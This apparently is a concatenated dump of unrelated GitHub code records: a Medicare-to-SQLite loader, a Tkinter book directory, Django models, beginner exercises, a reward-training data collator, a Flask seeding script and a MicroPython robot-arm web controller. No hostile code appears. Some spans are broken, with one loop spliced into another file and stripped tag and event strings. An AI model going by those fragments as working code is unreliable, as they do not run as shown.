results\n","repo_name":"salmannotkhan/fiverr-api","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"29261926229","text":"\n# coding: utf-8\n\n# In[1]:\n\n#Importing packages\nimport requests\nimport os\nimport zipfile\nimport openpyxl\nimport sqlite3\nimport glob\nimport csv\nimport numpy as np\nfrom numpy import array\n\n\n# In[2]:\n\n#url for the accessing the medicare data\nurl = \"https://data.medicare.gov/views/bg9k-emty/files/0a9879e0-3312-4719-a1db-39fd114890f1?content_type=application%2Fzip%3B%20charset%3Dbinary&filename=Hospital_Revised_Flatfiles.zip\"\n\n\n# In[3]:\n\n#Accessing the url\nr = requests.get(url)\n\n\n# In[4]:\n\n#Defining the staging directory name\nstaging_dir_name = \"staging\"\n\n\n# In[5]:\n\nstaging_dir_name = \"staging\"\nos.mkdir(staging_dir_name)\n\n\n# In[6]:\n\n#Checking if it is directory\nos.path.isdir(staging_dir_name)\n\n\n# In[7]:\n\n#Zip file name and path\nzip_file_name = os.path.join(staging_dir_name,\"test.zip\")\n\n\n# In[8]:\n\n#Checking if the zip file is created in the respective directory\nzip_file_name\n\n\n# In[9]:\n\n#\"wb\" is used to write in binary format\nzf = open(zip_file_name,\"wb\") \n\n\n# In[10]:\n\n#Writing the zip file content\nzf.write(r.content)\n\n\n# In[11]:\n\n#Closing the file\nzf.close()\n\n\n# In[12]:\n\n#'r' is used to read the file.......... extractall will unzip the contents\nz = zipfile.ZipFile(zip_file_name,'r')\n#Unzipping the test.zip file\nz.extractall(staging_dir_name)\n#Closing the zip file\nz.close()\n\n\n# In[13]:\n\n#Function to convert cp1252 to utf-8 format\ndef cp_to_utf (glob_dir):\n for file_name in glob.glob(glob_dir):\n print (file_name[8:])\n fn = os.path.join(staging_dir_name, file_name[8:])\n #print (\"*********************\")\n in_fp = open(fn,\"rt\",encoding = 'cp1252')\n input_data = in_fp.read()\n in_fp.close()\n ofn = os.path.join(staging_dir_name, file_name[8:])\n out_fp = open(ofn,\"wt\",encoding = 'utf-8')\n for c in input_data:\n if c != '\\0':\n out_fp.write(c)\n out_fp.close()\n #print(\"$$$$$$$$$$$$$$$$$$$$$$$$$\")\n #print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@\")\n\n\n# In[14]:\n\n#Converting the file name to table name as per the requirement\ndef tbl_name (glob_dir): \n #print(file_name)\n #print(file_name[8:-4])\n File_Name = file_name[8:-4]\n Table_Name = File_Name\n Table_Name = glob_dir[8:-4]\n print(Table_Name)\n Table_Name = Table_Name.lower()\n Table_Name = Table_Name.replace(' ', '_')\n Table_Name = Table_Name.replace('-', '_')\n Table_Name = Table_Name.replace('%', 'pct')\n Table_Name = Table_Name.replace('/', '_')\n if(Table_Name[0].islower() == False):\n T = 't_'+Table_Name\n #print(T)\n return T;\n #print(\"TTTTTTTTTTTTTTTTTTTTTTTTTTTTT\")\n else:\n T = Table_Name\n #print(T)\n #print(\"TTTTTTTTTTTTTTTTTTTTTTTTTTTTT\")\n return T;\n\n\n# In[15]:\n\n#Converting the column name as per the requirement\ndef col_name (C): \n #print(C)\n Column_Name = C\n #print(Column_Name)\n Column_Name = Column_Name.lower()\n Column_Name = Column_Name.replace(' ', '_')\n Column_Name = Column_Name.replace('-', '_')\n Column_Name = Column_Name.replace('%', 'pct')\n Column_Name = Column_Name.replace('/', '_')\n if(Column_Name[0].islower() == False):\n C = ['c_'+Column_Name]\n #print(C)\n return C;\n #print(\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCC\")\n else:\n C = [Column_Name]\n #print(C)\n #print(\"CCCCCCCCCCCCCCCCCCCCCCCCCCCCC\")\n return C;\n\n\n# In[16]:\n\n#Defining the path of the file and calling function for UTF-8 encoding conversion\nglob_dir = os.path.join(staging_dir_name,\"*.csv\")\ncp_to_utf(glob_dir)\n\n\n# In[17]:\n\n#Creating tables in SQL lite and inserting the data\nfor file_name in glob.glob(glob_dir):\n if file_name[8:] != \"FY2015_Percent_Change_in_Medicare_Payments.csv\": \n with open(file_name, 'r', encoding = 'UTF-8') as file:\n reader = csv.reader(file)\n Col_Name = next(reader)\n #print (file_name)\n #print (Col_Name)\n #print (\"$$$$$$$$$$$$$$$$$$$$$$$$$$\")\n Tab = tbl_name(file_name)\n Col = []\n for C in Col_Name:\n Col = Col+col_name(C)\n print (Col)\n print (\"&&&&&&&&&&&&&&&&&&&&&&&&&\")\n #Defining the connection to db\n conn = sqlite3.connect(\"medicare_hospital_compare.db\")\n #Defining the table\n DDL = \"create table if not exists \" + Tab + \" (\"\n for C_Name in Col[:-1]:\n DDL = DDL+C_Name+\" text, \"\n DDL = DDL+Col[-1]+\" text)\"\n c1 = conn.cursor()\n #Executing query to create stage tables\n c1.execute(DDL)\n #data = []\n #data_lst = []\n data_lst_lst = [row for row in reader if row != [' ']]\n data_lst_tup = [tuple(l) for l in data_lst_lst]\n DML_I = \"Insert into \" + Tab + \" values (\"\n i = 1\n while (i>', get_selected_row)\n# Scrollbar.\nscroller = Scrollbar(window)\nscroller.place(x=340,y=103,height=257)\n# Configure scrollbar for Listbox.\nlisting.configure(yscrollcommand = scroller.set)\nscroller.configure(command = listing.yview)\n\nlisting.bind('<>', get_selected_row)\n# Buttons for various operations on data.\nbutton1 = Button(window, \n text = \"View All\", \n width = 12, \n command = view_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton1.place(x=370,y=200)\n\nbutton2 = Button(window, \n text = \"Search Entry\", \n width = 12, \n command = search_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton2.place(x=370,y=225)\n\nbutton3 = Button(window, \n text = \"Add Entry\", \n width = 12, \n command = add_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton3.place(x=370,y=250)\n\nbutton4=Button(window,\n text=\"Update\", \n width = 12, \n command = update_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton4.place(x=370,y=275)\n\nbutton5 = Button(window, \n text = \"Delete Selected\", \n width = 12, \n command = delete_command,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton5.place(x=370,y=300)\n\nbutton6 = Button(window, \n text = \"Close\", \n width = 12, \n command = close,fg=\"#a1dbcd\",bg=\"#383a39\")\nbutton6.place(x=370,y=325)\n\nimport webbrowser\n\ndef callback(event):\n webbrowser.open_new(\"https://github.com/mmaithani\")\ndef callback2(event):\n webbrowser.open_new(\"https://github.com/mmaithani/My-Python-projects/tree/master/1.book_dictionary\")\ndef insta(event):\n webbrowser.open_new(\"https://www.instagram.com/aee_nobody/\")\ndef twitter(event):\n webbrowser.open_new(\"https://twitter.com/e9a16bb235e6485?lang=en\")\n# root= Tk()\n#---------------------------------------------------------------------------------------------\nimg = ImageTk.PhotoImage(Image.open(\"banner.gif\"))\npanel = Label(window, image = img)\npanel.grid(row=0,column=0)\n###############################################################################################\nlink = Label(window, text=\"Github profile\",fg='blue',bg=\"#a1dbcd\", cursor=\"hand2\")\nlink.place(x=0,y=412)\nlink.bind(\"\", callback)\n\nlink2 = Label(window, text=\"Github project link\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=0,y=430)\nlink2.bind(\"\", callback2)\n\nprofile = ImageTk.PhotoImage(Image.open(\"github_profile_pic.png\"))\npanel = Label(window, image =profile)\npanel.place(x=10,y=360)\n#---------------------------------------------------------------------------------------\ninstagram= ImageTk.PhotoImage(Image.open(\"insta.png\"))\npanel = Label(window, image =instagram)\npanel.place(x=110,y=365)\n\nlink2 = Label(window, text=\"Instagram\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=110,y=410)\nlink2.bind(\"\", insta)\n#--------------------------------------------------------------------------------------------------\n\ntweet= ImageTk.PhotoImage(Image.open(\"twitter.png\"))\npanel = Label(window, image =tweet)\npanel.place(x=180,y=362)\n\nlink2 = Label(window, text=\"Twitter\", fg=\"blue\",bg=\"#a1dbcd\", cursor=\"hand2\")\nlink2.place(x=180,y=410)\nlink2.bind(\"\", twitter)\n#--------------------------------\n\n\n\n\n# Keep window open until closed.\nwindow.mainloop()\n","repo_name":"mmaithani/My-Python-projects","sub_path":"1.book_directory/(main)Frontend.py","file_name":"(main)Frontend.py","file_ext":"py","file_size_in_byte":6602,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71296754408","text":"from django.conf import settings\r\nfrom django.db import models\r\nfrom django.contrib.auth.models import User\r\nfrom django.db.models.enums import Choices\r\n\r\n\r\n# Create your models here.\r\nclass Table1_Tempuser(models.Model): \r\n mobilenumber = models.IntegerField()\r\n otp = models.CharField(max_length=100,null=True,blank=True)\r\n expiretime = models.TimeField(auto_now_add=True)\r\n createdtime = models.TimeField(auto_now_add=True) \r\n\r\nChoices = ((\"Active\",\"Active\"),\r\n(\"InActive\",\"InActive\"))\r\nclass Table2_Customer(models.Model):\r\n\r\n customername =models.CharField(max_length=100)\r\n dob = models.DateField()\r\n email = models.EmailField()\r\n mobilenumber = models.IntegerField()\r\n created_date = models.DateField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\nclass Table4_tradetype(models.Model):\r\n tradeid = models.IntegerField()\r\n tradetype = models.CharField(max_length=100)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n \r\nclass Table3_tradesman(models.Model):\r\n Table_4_id = models.ForeignKey(Table4_tradetype,on_delete=models.CASCADE)\r\n tradesman_name = models.CharField(max_length=100)\r\n created_date = models.DateField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\n\r\n \r\nclass Table6_Image_Uplodad(models.Model):\r\n Table2_id = models.ForeignKey(Table2_Customer,on_delete=models.CASCADE)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n imagepath = models.ImageField()\r\n created_date = models.DateField(auto_now_add=True)\r\n\r\n\r\n\r\nChoices = ((\"Pending\",\"Pending\"),\r\n(\"Booked\",\"Booked\"),(\"Cancel\",\"Cancel\"))\r\n\r\n\r\nclass Table5_booktradesman(models.Model):\r\n Table2_id = models.ForeignKey(Table2_Customer,on_delete=models.CASCADE)\r\n Table3_id =models.ForeignKey(Table3_tradesman,on_delete=models.CASCADE)\r\n date = models.DateField(auto_now_add=True)\r\n time = models.TimeField(auto_now_add=True)\r\n status = models.CharField(choices=Choices,max_length=100)\r\n\r\n\r\n#class login(models.Model):\r\n user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\r\n created = models.DateTimeField(auto_now_add=True)\r\n phone_number = models.IntegerField(blank=True)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Amjadkhanasas/flitpaytask","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22839104689","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 6 00:05:25 2020\r\n\r\nLABORATORY\r\n\r\nScenario\r\nListen to this story: a boy and his father, a computer programmer, \r\nare playing with wooden blocks. They are building a pyramid.\r\n\r\nTheir pyramid is a bit weird, as it is actually a pyramid-shaped wall \r\n- it's flat. The pyramid is stacked according to one simple principle: \r\neach lower layer contains one block more than the layer above.\r\n\r\nYour task is to write a program which reads the number of blocks \r\nthe builders have, and outputs the height of the pyramid that can be built \r\nusing these blocks.\r\n\r\nNote: the height is measured by the number of fully completed layers \r\n- if the builders don't have a sufficient number of blocks and cannot \r\ncomplete the next layer, they finish their work immediately.\r\n\r\nTest your code using the data we've provided.\r\n\r\n@author: David\r\n\"\"\"\r\n\r\n#Programa que evalúa la altura (en bloques) de una pirámide\r\n\r\nnblocks = int(input(\"Ingrese el número de bloques\\t\"))\r\ncounter = 0\r\nb = 0 #acumulador de número de bloques\r\na = 0 #Indicador número de piso\r\n#for i in range (1,10):\r\nwhile (True):\r\n a = a + 1 #contador de número de pisos\r\n b = b + a #acumulador de número de bloques\r\n #print (a,end = \" \")\r\n #print (b,end = \" \")\r\n #print(\"\\n\")\r\n if (b-nblocks) == 0:\r\n print(\"número de bloques\",nblocks)\r\n print (\"The height of the pyramid is:\",a)\r\n break\r\n if (b >= nblocks):\r\n c = a - 1 # recálculo del número de pisos\r\n print(\"número de bloques\",nblocks)\r\n print (\"The height of the pyramid is:\",c)\r\n break\r\n\r\n# Para resolver el problema se hizo:\r\n# Una tabla comparativa n = 1,3,6,10,15,21,28 (número de bloques)\r\n # p = 1,2,3,04,05,06,07 (altura de la pirámide)\r\n# a = a + 1 es un contador interno al lazo while a = 1,2,3...\r\n# b = b + a suma el número de bloque acorde con el contador a\r\n# si b - nblocks == 0: el número de bloques ingresados sirve para hacer\r\n #pisos enteros\r\n# si b > nblocks: el número de bloques ingresados no es suficiente para\r\n # hacer un piso completo\r\n # num pisos c = a -1\r\n \r\n \r\n","repo_name":"JDavid121/Script-Curso-Cisco-Python","sub_path":"65 for loop.py","file_name":"65 for loop.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31967181176","text":"# -*- coding: utf-8 -*-\n# @Time : 2023/5/6 5:50 p.m.\n# @Author : JianingWang\n# @File : data_collator.py\n\nimport torch\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom transformers import PreTrainedTokenizerBase\n\n\n@dataclass\nclass DataCollatorForDefaultPairwiseRewardTraining:\n tokenizer: PreTrainedTokenizerBase\n max_length: Optional[int] = 512\n pad_to_multiple_of: Optional[int] = None\n pad_to_max_length: Optional[bool] = None\n is_segment_spans: Optional[bool] = False\n\n def __call__(self, features):\n # Tokenize\n # is_train = features[0][\"is_train\"] > 0\n batch = []\n for f in features:\n\n chosen_sequences = f[\"chosen_sequences\"] + [self.tokenizer.pad_token_id] * (self.max_length - len(f[\"chosen_sequences\"]))\n chosen_attention_mask = f[\"chosen_attention_mask\"] + [0] * (self.max_length - len(f[\"chosen_attention_mask\"]))\n rejected_sequences = f[\"rejected_sequences\"] + [self.tokenizer.pad_token_id] * (self.max_length - len(f[\"rejected_sequences\"]))\n rejected_attention_mask = f[\"rejected_attention_mask\"] + [0] * (self.max_length - len(f[\"rejected_attention_mask\"]))\n\n # print(\"chosen_sequences=\", chosen_sequences)\n # print(\"chosen_attention_mask=\", chosen_attention_mask)\n # print(\"rejected_sequences=\", rejected_sequences)\n # print(\"rejected_attention_mask=\", rejected_attention_mask)\n \n batch.append({\n \"chosen_sequences\": chosen_sequences,\n \"chosen_attention_mask\": chosen_attention_mask,\n \"rejected_sequences\": rejected_sequences,\n \"rejected_attention_mask\": rejected_attention_mask,\n })\n\n # batch = self.tokenizer.pad(\n # batch,\n # padding=\"max_length\",\n # max_length=self.max_length,\n # return_tensors=\"pt\"\n # ) \n batch = {key: torch.Tensor([f[key] for f in batch]).long() for key in batch[0].keys()}\n\n return batch","repo_name":"HugAILab/HugNLP","sub_path":"processors/reinforcement_learning/data_collator.py","file_name":"data_collator.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"41370116573","text":"#crear una comparacion de dos edades 1 y edad 2\n\nedad1=int (input(\"ingrese edad1: \"))\nedad2=int (input(\"ingrese edad2: \"))\nif edad1>edad2:\n print (\"es mayor \") \nif edad1==edad2: \n print (\"son iguales\")\nelse :\n print (\"edad2 es mayor\")\n\n#preguntar 10 veces un entero y luego sumar con while\n\nx=1\nsuma=0\nwhile x<=10:\n valor=int(input(\"Ingrese un valor:\"))\n suma=suma+valor\n x=x+1\nprint (suma)\n\n\n#preguntar 10 veces un entero y luego sumar con FOR\n\nlista=[]\nfor x in range (10):\n lista.append (int(input(\"introduce valor en lista:\")))\n suma=0\nfor i in lista:\n\tsuma += i\nprint (\"el resultado es: \" +str (suma))\n\n#crear una funcion simple que MULTIPLIQUE,SUMA,RESTE Y DIVIDA dos numeros\n\ndef datos():\n global v1\n global v2\n v1=int(input(\"ingrese numeros\"))\n v2=int(input(\"ingrese numeros\"))\n\ndef suma():\n sumar= v1+v2\n print (\"el resultado de la suma\" +str(sumar) )\n\ndef resta():\n restar= v1-v2\n print (\"el resultado de la resta\" +str(restar) )\n\n\ndef dividir():\n divide= v1/v2\n print (\"el resultado de dividir\" +str(divide) ) \n\ndef multi():\n multiplicar= v1*v2\n print (\"el resultado de multiplicar\" +str(multiplicar) )\n\ndatos()\nsuma()\nresta()\ndividir()\nmulti()\n\n","repo_name":"room29/python","sub_path":"PRACTICAS.py","file_name":"PRACTICAS.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4057347214","text":"from flask.cli import FlaskGroup, click\nimport os\nimport ssl\nfrom cryptography import x509\nfrom cryptography.x509.oid import NameOID\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\n\nfrom project import app, db\nfrom project.models.User import User\nfrom project.models.Group import Group\nfrom project.models.Schedule import Schedule\nfrom project.models.Training import Training\nfrom project.models.Exercise import Exercise\n\nfrom datetime import time\nimport datetime\nfrom copy import copy\n\n\ndef generate_self_signed_cert(cert_file, key_file):\n from cryptography.hazmat.primitives.asymmetric import rsa\n # Generar una clave privada RSA\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n\n # Construir el certificado autofirmado\n subject = issuer = x509.Name([\n x509.NameAttribute(NameOID.COMMON_NAME, u\"localhost\")\n ])\n cert = x509.CertificateBuilder().subject_name(\n subject\n ).issuer_name(\n issuer\n ).public_key(\n private_key.public_key()\n ).serial_number(\n x509.random_serial_number()\n ).not_valid_before(\n datetime.datetime.utcnow()\n ).not_valid_after(\n # El certificado será válido por 365 días\n datetime.datetime.utcnow() + datetime.timedelta(days=365)\n ).add_extension(\n x509.SubjectAlternativeName([x509.DNSName(u\"localhost\")]), critical=False).sign(private_key, hashes.SHA256(), default_backend())\n\n # Guardar la clave privada en 'key.pem'\n with open(key_file, \"wb\") as key_file:\n key_file.write(private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()\n ))\n\n # Guardar el certificado en 'cert.pem'\n with open(cert_file, \"wb\") as cert_file:\n cert_file.write(cert.public_bytes(serialization.Encoding.PEM))\n\n\ncert_file = \"cert.pem\"\nkey_file = \"key.pem\"\nif os.path.exists(cert_file) and os.path.exists(key_file):\n True\n # print(\"Los archivos 'cert.pem' y 'key.pem' ya existen.\")\nelse:\n generate_self_signed_cert(cert_file, key_file)\n # print(f\"Certificado autofirmado generado y guardado en '{cert_file}' y '{key_file}'.\")\ncontext = ssl.SSLContext(ssl.PROTOCOL_TLS)\ncontext.load_cert_chain(cert_file, key_file)\n\ncli = FlaskGroup(app)\n\n\n@cli.command(\"create_db\")\ndef create_db():\n db.drop_all()\n db.create_all()\n db.session.commit()\n\n\n@cli.command(\"seed_db\")\ndef seed_db():\n\n # Creacion de usuarios\n user1 = User(username='carlos', password='zantana', role=User.Role.TEACHER, gender=User.Gender.MALE, age=75)\n db.session.add(user1)\n user2 = User(username='gustavo', password='cerati', role=User.Role.TEACHER, gender=User.Gender.MALE, height=1.86, age=55)\n db.session.add(user2)\n user3 = User(username='vanilla', password='ice', role=User.Role.STUDENT, gender=User.Gender.MALE, age=55)\n db.session.add(user3)\n user4 = User(username='dua', password='lipa', role=User.Role.STUDENT, gender=User.Gender.FEMALE, height=1.73, age=27)\n db.session.add(user4)\n user5 = User(username='juan', password='mortadela', role=User.Role.STUDENT, gender=User.Gender.MALE, height=1.73, age=22)\n db.session.add(user5)\n\n db.session.commit()\n\n # Creacion de entrenamientos cada cual con sus respectivos ejercicios\n exercises = [\n Exercise(name=\"curl de biceps\", description=\"...\", speed=2.0, heart_rate=90.0, duration=30.0),\n Exercise(name=\"flexiones\", description=\"...\", speed=4.0, heart_rate=90.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=100.0)]\n training_arms = Training(name=\"Brazos\", description=\"Entrenamiento de brazos\", teacher_id=user1.id, exercises=exercises)\n exercises = [\n Exercise(name=\"sentadillas\", description=\"...\", speed=3.0, heart_rate=120.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=400.0)]\n training_legs = Training(name=\"Piernas\", description=\"Entrenamiento de piernas\", teacher_id=user2.id, exercises=exercises)\n exercises = [\n Exercise(name=\"abdominales\", description=\"...\", speed=3.0, heart_rate=120.0, duration=30.0),\n Exercise(name=\"bicicleta\", description=\"...\", speed=7.0, heart_rate=90.0, duration=300.0)]\n training_core = Training(name=\"Core\", description=\"Entrenamiento de core\", teacher_id=user2.id, exercises=exercises)\n\n # Creacion de grupos\n schedules = [\n Schedule(day=Schedule.Day.MONDAY, starttime=time(8, 0, 0), endingtime=time(12, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.THURSDAY, starttime=time(16, 0, 0), endingtime=time(18, 0, 0), training=training_legs)]\n group1 = Group(name='ciclismo rapido', privacy=Group.Privacy.PUBLIC, teacher=user1, description='Grupo centrado en la aceleracion del ritmo, que nadie te alcance.', capacity=20, schedules=schedules)\n group1.add_user(user3)\n group1.add_user(user4)\n db.session.add(group1)\n schedules = [\n Schedule(day=Schedule.Day.WEDNESDAY, starttime=time(17, 0, 0), endingtime=time(19, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.FRIDAY, starttime=time(16, 0, 0), endingtime=time(18, 0, 0), training=training_core)]\n group2 = Group(name='ciclismo alter', privacy=Group.Privacy.PRIVATE, teacher=user2, description='Ciclismo alternativo, conoce todo el potencial de la bicicleta.', difficulty=Group.Difficulty.MIDDLE, schedules=schedules)\n group2.add_user(user4)\n db.session.add(group2)\n schedules = [\n Schedule(day=Schedule.Day.MONDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.TUESDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.WEDNESDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.THURSDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.FRIDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs),\n Schedule(day=Schedule.Day.SATURDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_core),\n Schedule(day=Schedule.Day.SUNDAY, starttime=time(7, 0, 0), endingtime=time(9, 0, 0), training=training_legs)]\n group3 = Group(name='ciclismo hardcore', privacy=Group.Privacy.PUBLIC, teacher=user2, description='Una vida, una bici, un destino.', difficulty=Group.Difficulty.HARD, capacity=10, schedules=schedules)\n db.session.add(group3)\n schedules = [\n Schedule(day=Schedule.Day.SUNDAY, starttime=time(6, 0, 0), endingtime=time(10, 0, 0), training=training_arms)]\n group4 = Group(name='grupo super exclusivo', privacy=Group.Privacy.PRIVATE, teacher=user1, description='El grupo mas exclusivo de todos.', difficulty=Group.Difficulty.EASY, capacity=1, schedules=schedules)\n group4.add_user(user3)\n db.session.add(group4)\n\n db.session.commit()\n\n\nif __name__ == \"__main__\":\n\n cli()\n # with app.app_context():\n # create_db()\n # seed_db()\n # app.run(ssl_context=context, host='0.0.0.0', port=5000, debug=True)\n","repo_name":"Sansanto2000/DEU2023-Backend","sub_path":"services/web/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6078761059","text":"#\n# Utilisation d'un bras articule par un navigateur Web\n#\n# Materiel :\n# Testé sur ESP32 WROOM et Heltec Wifi Kit 32\n# Bras impression 3D (https://www.thingiverse.com/thing:34829)\n# 5 servos SG90\n# MicroPython version 1.10\n#\n# Programme qui permet de piloter le bras articule via un navigateur \n# internet en WiFi et de jouer un scenario sauvegarde\n#\n# Auteur : iTechnoFrance\n#\n\nimport machine, time, network, socket, _thread\n\n# declaration des servos avec une frequence de 50 Hertz\nservo_pivot = machine.PWM(machine.Pin(12), freq=50)\nservo_bras_1 = machine.PWM(machine.Pin(13), freq=50)\nservo_bras_2 = machine.PWM(machine.Pin(14), freq=50)\nservo_bras_3 = machine.PWM(machine.Pin(26), freq=50)\nservo_pince = machine.PWM(machine.Pin(27), freq=50)\n\n# parametres des servos \nposition_pivot = 0\nposition_bras_1 = 0\nposition_bras_2 = 0\nposition_bras_3 = 0\nposition_pince = 0\n\n# permet de sauvegarder les mouvements pour les rejouer\nmouvements_pivot = []\nmouvements_bras_1 = []\nmouvements_bras_2 = []\nmouvements_bras_3 = []\nmouvements_pince = []\n\n# variable pour l'utilisation d'AJAX\nXML = ''\n\n# permet de quitter le Thread\nplay_infini = False\n \ndef config_wifi():\n # configure le module en point d'acces Wifi\n ap = network.WLAN(network.AP_IF) # creation point d'acces WiFi\n ap.active(True) # activation du point d'acces WiFi \n ap.config(essid='microarm', channel=11, hidden=False)\n ip = ap.ifconfig()[0]\n return ip\n \ndef initialisation_bras():\n # initialise le bras\n global position_pivot, position_bras_1, position_bras_2\n global position_bras_3, position_pince\n position_bras_1 = 80 # bras en haut\n servo_bras_1.duty(position_bras_1)\n time.sleep_ms(500)\n position_bras_2 = 110 # bras en haut\n servo_bras_2.duty(position_bras_2)\n time.sleep_ms(500)\n position_bras_3 = 60 # bras au milieu\n servo_bras_3.duty(position_bras_3)\n time.sleep_ms(500)\n position_pivot = 60 # pivot au milieu\n servo_pivot.duty(position_pivot)\n position_pince = 90 # pince mi ouverte\n servo_pince.duty(position_pince)\n \ndef construit_xml():\n # permet de generer le xml a transmettre a la page html\n global XML\n XML = \"\"\n XML += \"\"\n XML += \"\"\n XML += str(position_pivot)\n XML += \"\"\n XML += \"\"\n XML += str(position_bras_1)\n XML += \"\"\n XML += \"\"\n XML += str(position_bras_2)\n XML += \"\"\n XML += \"\"\n XML += str(position_bras_3)\n XML += \"\"\n XML += \"\"\n XML += str(position_pince)\n XML += \"\"\n XML += \"\"\n \ndef pivot(nouvelle_position):\n # positionne le pivot\n global position_pivot\n position_actuelle = position_pivot\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_pivot.duty(i)\n time.sleep_ms(10)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_pivot.duty(i)\n time.sleep_ms(10)\n position_pivot = nouvelle_position\n \ndef bras_1(nouvelle_position):\n # positionne le 1er bras\n global position_bras_1\n position_actuelle = position_bras_1\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_bras_1.duty(i)\n time.sleep_ms(30)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_bras_1.duty(i)\n time.sleep_ms(30)\n position_bras_1 = nouvelle_position\n\ndef bras_2(nouvelle_position):\n # positionne le second bras\n global position_bras_2\n position_actuelle = position_bras_2\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_bras_2.duty(i)\n time.sleep_ms(30)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_bras_2.duty(i)\n time.sleep_ms(30)\n position_bras_2 = nouvelle_position\n\ndef bras_3(nouvelle_position):\n # positionne le 3eme bras\n global position_bras_3\n position_actuelle = position_bras_3\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_bras_3.duty(i)\n time.sleep_ms(30)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_bras_3.duty(i)\n time.sleep_ms(30)\n position_bras_3 = nouvelle_position\n\n\ndef pince(nouvelle_position):\n # positionne la pince\n global position_pince\n position_actuelle = position_pince\n if nouvelle_position >= position_actuelle:\n for i in range(position_actuelle, nouvelle_position):\n servo_pince.duty(i)\n time.sleep_ms(30)\n if nouvelle_position < position_actuelle:\n for i in range(position_actuelle, nouvelle_position, -1):\n servo_pince.duty(i)\n time.sleep_ms(30)\n position_pince = nouvelle_position\n\ndef mouvements_init():\n # clic sur bouton 'init', on initialise le scenario\n global mouvements_pivot, mouvements_bras_1\n global mouvements_bras_2, mouvements_bras_3, mouvements_pince\n mouvements_pivot = []\n mouvements_bras_1 = []\n mouvements_bras_2 = []\n mouvements_bras_3 = []\n mouvements_pince = []\n \ndef mouvements_sauve():\n # clic sur bouton 'sauve', on sauvegarde chaque servo\n global mouvements_pivot, mouvements_bras_1\n global mouvements_bras_2, mouvements_bras_3, mouvements_pince\n mouvements_pivot.append(position_pivot)\n mouvements_bras_1.append(position_bras_1)\n mouvements_bras_2.append(position_bras_2)\n mouvements_bras_3.append(position_bras_3)\n mouvements_pince.append(position_pince)\n\ndef mouvements_play():\n # clic sur bouton 'executer une fois', on execute une seule\n # fois les différentes positions des servos\n mouvements = len(mouvements_pivot)\n for mouvement in range(0, mouvements):\n pivot(mouvements_pivot[mouvement])\n bras_1(mouvements_bras_1[mouvement])\n bras_2(mouvements_bras_2[mouvement])\n bras_3(mouvements_bras_3[mouvement])\n pince(mouvements_pince[mouvement])\n time.sleep_ms(100)\n \ndef mouvements_play_infini():\n # clic sur bouton 'executer en boucle', on execute en boucle\n # 